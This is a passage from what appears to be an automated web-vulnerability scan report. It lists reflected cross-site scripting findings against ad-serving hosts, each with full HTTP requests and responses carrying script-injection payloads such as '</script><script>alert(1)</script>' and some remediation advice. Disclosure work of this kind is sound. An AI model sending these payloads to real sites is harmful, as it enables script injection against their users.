Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=-7D3jhve-_dqBXor_KGJlXkh6uMLiJASzHFQS38JXoTG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ9aseWXXyEg6ngdmdtCJ98TaaCzQk38mLAksW0DqSbPYbySfUM3MRmwu87R_bnrJOV4gv5uh11F4sQPDcy793aXQyWberVE7H9dGuTlyTFp3RaUANT5eBsokdVPtiFhbZlnsCNKZNegbrth_D7SWf8-GRakhudMFH92bLqvo7whZCttHGvuJqzUmN3TCnRRWA9RzbA2m8y8-md7vvpCypQN__nnhKkgreG7OSDcaZV8DtILSxhIqj1_8W_b-sPL2rmo28BWvcjGNUxT50RKm6bHeo49rmT7jj-OFCxy7LUUTGOKwgYTlqkzoPyBtxx8IAv5QN-B4qn85KrWNXkRxjrbOKBw1n7GMckFqA6EpnplKzaOHG6TZ2deht-u0YLfBKH6Pa-p1gEeo6-aXDdZFMAmjhzhGEdbwvglvH0-24dOZTOW2rPb1SgA4pngxLGaQQtnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlLz4BQlJ6csz8dB0J_8c8Ka0J_7oKjjzxbQbmixkRIYsAMcBeVd41aCv5NIHe_tLft3hmpmMKAwSnUY_W2vbKxi5DYHhi24I8waLdyGYBf3-MaTnGr8K_HGinZrBfbZveONlgZZNIb4imigs__tVs5_-ofKtZ6hXXSZpdwBNj6GJboI-S1pQlAm9WAm2qWReCcDoZ7E02XMENjv3ClnVh50sfKj_XnOycnqr1f-q8U8AE4G03BTk0fzq7l2lZkr8VkAgj7Wkf7Z-tgLIpA1wB2yzoRrgUiaRdOvE17AKUsymItYwTHyhwXAUBXi6D6PqPXyEGeO1Zz6qPU8NhJ7wMtVPQFf5dsx4yIMgZcA57lrmBiIHuEACwgcsGnk3f55POjRgsWdgnGrl2gT_wrbiSH9GS32-3vC2xqxP7e5vHxFUGj7jmQul9hhXiSWuClGE3RPf0vY5j10d73GHcIzZGN7ew5Q1a2Jatefo_kPZe9ev4zG24J2Kc93KYfJqWJL5G-XhStGducGUCpASNzOmiggs84qnGaLTJJhRTIpFjT7WIs2Qp4sZFseTH4XqopbjkCcflfgayr40dr4ggTgLxRYlq-sDEfjhI0bEAhsL4dT5tAwWq2UVacc2NOW6nmLabkc3sJNc7e1BoJUkxklm2VAglnp_rMWjHAhM9k1KaSm8OWsPIHPqgUorS3Sa63Z4dXkNgeGLbgjzBot3IZgF_f43q0orUcCB1pzamJnrHZbwDgKuBt10k4qS0Y4XqmheDZzWncGPQ-obDcn4rklvspcF4T1MvNY3wH8WmfBVBADewOhnsTTZcwQ2O_cKWdWHnRHnW0MvCAdVOvB_H5-CgFPTgbTcFOTR_OruXaVmSvxWaotkZUMh8YO2CDHSkuQHNvpYL9IxVdLMAO0ccWwxLTWi1jBMfKHBcBQFeLoPo-o9Ug56BpCRUAZFpmVCXZ3Qd10ruuV1lK6btQ_JxbV8gRwSuoy0wOsY4RyZOeRLXa79L_0UruZ7SQ7nDOH3_UpK9C1uwMA7iZtQ-ABBZnlRLpDLQa3T1jvMzxa6vvkjDgWIUGmyDGPkmTeStGjtZLZBTYqFNU9MJ5YE_zpkKWEn7owTls_2Ri7Iyye7TGUfqeyZ5eFK0Z25wZQKkBI3M6aKCA6vC23uVfJ0RdBdeAtvHyQizZCnixkWx5MfheqiluOQGlg-ItAIsZxzqSPRpmEAmoRmAytNEC5X_1tKtPKPo9q_E6bbLezcAxfHFhLtj9YhI3avFK_HA-CwpQ_ryY3RW2I4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIdyIarOzLznCpjY3H8bdib18klrWFfTp2Nb1WaOVWuPLHxJelnxED3MVl_uERX9gK5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4i5vLq95iSQ2aeieaQBbTOIlboYXPkW8MWo4rGR69X3pWLxNksW9701Q8uH9_xMEPefznIrlo3WqyPN2D7Ebz9IitcUhJWLMqI_ZYtAMVlGLMrXFISVizKiP2WLQDFZRizK1xSElYsyoj9li0AxWUYsytcUhJWLMqI_ZYtAMVlGLMaPnwPi2iKD7qRkIeSQCAppTiYieerdsyfHnQplwsVNkkPGTOkzPwCUhGIeJybbU25tEjavJfHgFGxLIy_cdxU; fc=mVeMhp7-ld4_XVGY83oSyV3hWUCDbGhmmT9X_UI3cPCqlZbi8OtpyiRwC3bGcdNYqLcvXewLkRbbhMxP5KrQ6js1B_gXcB-qUuts5vF-XAQJlqbR_nvs1sBCEK8H0zsggHYjhoCFjnYm98tOIGVnz9yTqQnfFF8yP7lyDdApkMNbSdeeg1n_QtTgQFvfHLFQT9zwFbWJbyuxwzjlcHRJHBCWkGjVFo180HpWwPYRgVebRjcEB4F4-tbn-dbadQ3U2hGJYNwpXrvgU2zjApqVDS_ZolmR3JdiZaysD2zF72o; pf=KIMUptIal9Nliw08sJTQpzrAikl_fVScFd4qmGyTXES6o4VUW939ncJz_M9dzB62UmrMBVMpgSsIblFazRSHFvyNJGSTFQowtlkWEXspEEWyUA8lyShqTNjLCWmR35lQAe0q7YBFq60qdkok49Ub4icsZdLX4b0PU7FeYXqY03oQHhICh13Elq4vwAwd9rb_XWux54k9t4WxZeFvO_AmtBGWCx2R5xgPC_s5kwxYv523cpL3MMGZNZjM0sSgc3mUjHLQ52r_73tBHOt9AwJrvZSqu2QLfhe55HtMHLH7N4dkI6rwS_FFgauEgoqML85x-1Q3I8oslvAtuyyBsRV6-fzGtf-psK3vfYzM0TUbrRG6q-YPtF8T5YI7kk_i1ZmwdQvGUDdnJ9Q7wqHvVSgCUe7QnJne7ClW0JjJrTY14UTX0rL3iR-kLOOVUOxvehKvsHdHnq4okb07IhP8RrNrcwgNI19g506sy3_lUJPsfl8CGpZK0GFVXeLagp8b1KheELIeEizlDhW6ALtV-GQktuNrQgY57q_B3M-YWTk5qHl07ZpIsC5rrDcwqi2ouvVPptSDGP-GxrCvh-LDjgUd8ZWn7eX_qShrxTbEz_JoQSgkazJjbqogOCGJzp2JwtRxDWW37YD88Oq2q3BJWHMgKp-8bXaWq_ZlUx6tQG9MYgzWnuhICg6DCwbzB8f7O2jIvbxrd5gRo7UNJEp0C8RZD92mAEbpo7VKVZrCc_AFXuEw4VIHl-z6HMGQRzQICMRhyuiZtIpWBYJtFLLA7SWXOYEU1_XIPwT1jfR4VPfRTv6qsLf6D_fnIicUB0pybsIJ2dSqszIzCHMknU-DzVWrNDFM0eGdpjiZO9Ug6jvGBWHuwWjoa3XnE-vhUMqDroQX2i6VQ6o_vJB_s4peYdQHY3PMMUyh2TsgW_znILL-KMVz13JtznmvyeJM_Daav9q-XnC1B7eE2tx0YggEyRGivFBamygjHG5s3uqc4ZO0Su8slXBOHELwL_WMS1ltJh96VLEo5_Rdhy_O_2EbMTxTAB0QzSJLUYL8bvwf_ltWWx49gVG3YRVwjUzsS8cC9tu6PidGJMqmtISA_uBS2GO5emL721cN01WezRNF3l2Jos_32v1JcRdapCworTlW2GnMExs5_u_TEM0IsgE042YcjSnppdr0odeZIIibPByrMIei80W5BDQQmmuXn2BLK2L9VtuwCf0POxmlxjYSO1lO1I6hKPYFh4mC6TZ40m4ac8DKhk2RFegnRLefeZzr8xfHFa7v9HA91JbM5tgynojFu8fmABjZRVBOjbBfTb6Ls-mWBj_6dVFVYBPegaB9ftcm142azN2X6FZLfxHmAJn-TJniBnp3df3A41qYmrDHKEZZ3bqhSTU4dzKj-8nCSiEIK8MjEnLFmwlewonlU5AzOKYGFzmSaC07WQoOi1NX0_sHM7t1P_oDF3ijSQ_b3u4oeJKmVFGrK9unqqF0v5SN3KLim53Jf3v8Px0gg3kgqLE88BFAvW1TPuVrz5YTyJR7pzkVyYP8gQOuOeXedZf-9w; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:19:44 GMT
Content-Length: 383

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=4334313441313216613&fpid=1&nu=n&t=&sp=1d38b"><script>alert(1)</script>52781f3e18&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4569b</script><script>alert(1)</script>c81f0fa8af3 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*4569b</script><script>alert(1)</script>c81f0fa8af3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
j0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*4569b</script><script>alert(1)</script>c81f0fa8af3">
...[SNIP]...

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af7b8</script><script>alert(1)</script>6382afb3d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*&af7b8</script><script>alert(1)</script>6382afb3d48=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*&af7b8</script><script>alert(1)</script>6382afb3d48=1">
...[SNIP]...

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ea4</script><script>alert(1)</script>fbf80e2f0b1 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*d8ea4</script><script>alert(1)</script>fbf80e2f0b1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 13:11:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
0rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*d8ea4</script><script>alert(1)</script>fbf80e2f0b1">
...[SNIP]...

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80241</script><script>alert(1)</script>c5dc4fefe22 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*80241</script><script>alert(1)</script>c5dc4fefe22 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
bmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*80241</script><script>alert(1)</script>c5dc4fefe22">
...[SNIP]...

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbd25</script><script>alert(1)</script>0570fbfbabe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*&fbd25</script><script>alert(1)</script>0570fbfbabe=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
mi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*&fbd25</script><script>alert(1)</script>0570fbfbabe=1">
...[SNIP]...

4.42. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1cfe"><script>alert(1)</script>b25c941bd8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=806254&b1cfe"><script>alert(1)</script>b25c941bd8e=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
